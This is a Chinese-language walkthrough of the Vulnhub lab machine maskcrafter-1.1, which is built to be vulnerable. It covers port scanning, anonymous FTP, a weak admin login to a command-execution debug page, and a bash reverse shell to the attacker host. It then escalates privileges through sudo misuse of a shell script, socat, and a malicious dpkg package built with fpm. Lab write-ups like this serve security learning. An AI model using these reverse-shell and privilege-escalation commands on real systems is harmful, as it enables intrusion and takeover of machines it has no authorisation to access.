Vulnhub:maskcrafter-1.1靶机
2024-10-20 20:41:41
kali:192.168.111.111
靶机:192.168.111.187
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.187
ftp匿名登陆发现两个文件
ftp 192.168.111.187
NOTES.txt提示存在用户名admin
cred.zip需要密码
目录爆破发现debug目录
漏洞利用
访问debug目录,使用弱口令:admin|admin登录后发现可以执行命令
使用burp抓包替换执行的命令为反弹shell,反弹shell需要url编码后才能执行
bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'
提权
查看/var/www/html/db.php获得mysql数据库账号密码
使用账号密码:web|P@ssw0rdweb,登录mysql查看mydatabase数据库中的creds表获得cred.zip压缩包的密码
mysql -uweb -pP@ssw0rdweb
解压后获得userx用户的密码
userx用户sudo -l
修改/scripts/whatsmyid.sh内容为
#!/bin/bash
/bin/bash
执行脚本后切换到evdaez用户
sudo -u evdaez /scripts/whatsmyid.sh
evdaez用户sudo -l
提权方法:https://gtfobins.github.io/gtfobins/socat/#sudo,执行命令后切换到用户researcherx
sudo -u researcherx socat stdin exec:/bin/sh
researcherx用户sudo -l
提权方法:https://gtfobins.github.io/gtfobins/dpkg/#sudo
先安装fpm,安装方法:https://fpm.readthedocs.io/en/latest/installation.html
安装好fpm后在kali上运行以下命令,运行之后会生成x_1.0_all.deb软件包
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
本地用python开启http服务
python3 -m http.server
靶机上使用wget下载x_1.0_all.deb软件包
之后安装该软件包提升到root权限
sudo -u root dpkg -i x_1.0_all.deb
获得flag
最新文章
- caffe中卷积层和pooling层计算下一层的特征map的大小
- 一步步搭建react-native环境(苹果OS X)
- SSIS2012 项目部署模型
- Yii2中request的使用
- myeclipse如何修改Web项目名称,eclipse如何修改项目名字
- Centos添加新硬盘、分区、格式化、自动挂载
- Xamarin.Forms项目无法添加服务引用
- jq 动态判断设备添加对应meta viewport属性内同
- eclipse插件hibernate tools安装 爱好者
- 27 Best Free Eclipse Plug-ins for Java Developer to be Productive
- iOS LaunchScreen设置启动图片,启动页停留时间
- 验证视图状态MAC失败解决方案
- java中 SSL认证和keystore使用
- C++将一个数组内容赋给另一个数组
- python 命令行参数——argparse模块的使用
- 如何明确区分代码中的1和l
- 20175234 2018-2019-2 《Java程序设计》第四周学习总结
- 加盟阿里!贾扬清被曝从Facebook离职,任阿里硅谷研究院VP
- Oracle11.2.0.1 升级Oracle11.2.0.4 后 listener 的端口改变需要处理
- [skill][debug][gdb] 使用core dump 进行GDB